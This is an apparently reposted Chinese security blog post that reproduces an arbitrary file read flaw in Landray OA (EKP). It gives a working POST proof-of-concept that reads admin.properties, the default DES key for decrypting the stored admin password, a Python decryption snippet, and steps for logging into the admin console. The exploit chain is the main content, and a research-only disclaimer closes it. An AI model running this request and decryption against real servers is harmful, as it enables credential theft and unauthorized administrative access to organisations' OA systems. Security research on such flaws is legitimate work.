X凌OA系統任意文件讀取-DES解密



 
X凌OA系統任意文件讀取-DES解密
一、漏洞描述
深圳市藍凌軟件股份有限公司數字OA(EKP)存在任意文件讀取漏洞。攻擊者可利用漏洞獲取敏感信息
二、漏洞影響
藍凌OA
三、
利用 藍凌OA custom.jsp 任意文件讀取漏洞 讀取配置文件
讀取路徑:
 
/WEB-INF/KmssConfig/admin.properties
讀取文件:
 
 
POC:
 
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: 127.0.0.1 User-Agent: Go-http-client/1.1 Content-Length: 60 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
獲取密碼DES解密登陸后台:默認密鑰為 kmssAdminKey
 
 
訪問后台登台:
http://127.0.0.1/admin.do
 
 
成功登陸后台:
 
 
編寫POC腳本驗證:
 
 
還需要自己去驗證解密:
編寫本地DES解密:
 
def decrypt_str(s): k = des(Des_Key, ECB, Des_IV, pad=None, padmode=PAD_PKCS5) decrystr = k.decrypt(base64.b64decode(s)) print(decrystr) return decrypt_str
 
 
發現key字符過長:
ValueError: Invalid DES key size. Key must be exactly 8 bytes long.
密鑰長了,查了一下下 需要前面8位就OK 也能解開
 
 
直接解密明文:
 
 
參考:
https://github.com/Cr4y0nXX/LandrayReadAnyFile
免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
如果本文內容侵權或者對貴公司業務或者其他有影響,請聯系作者刪除。
轉載聲明:著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請注明出處。
訂閱查看更多復現文章、學習筆記
thelostworld
安全路上,與你並肩前行!!!!
 
 
個人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
個人簡書:https://www.jianshu.com/u/bf0e38a8d400
個人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
個人博客園:https://www.cnblogs.com/thelostworld/
FREEBUF主頁:https://www.freebuf.com/author/thelostworld?type=article
語雀博客主頁:https://www.yuque.com/thelostworld
 
 
歡迎添加本公眾號作者微信交流,添加時備注一下“公眾號”
 
 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM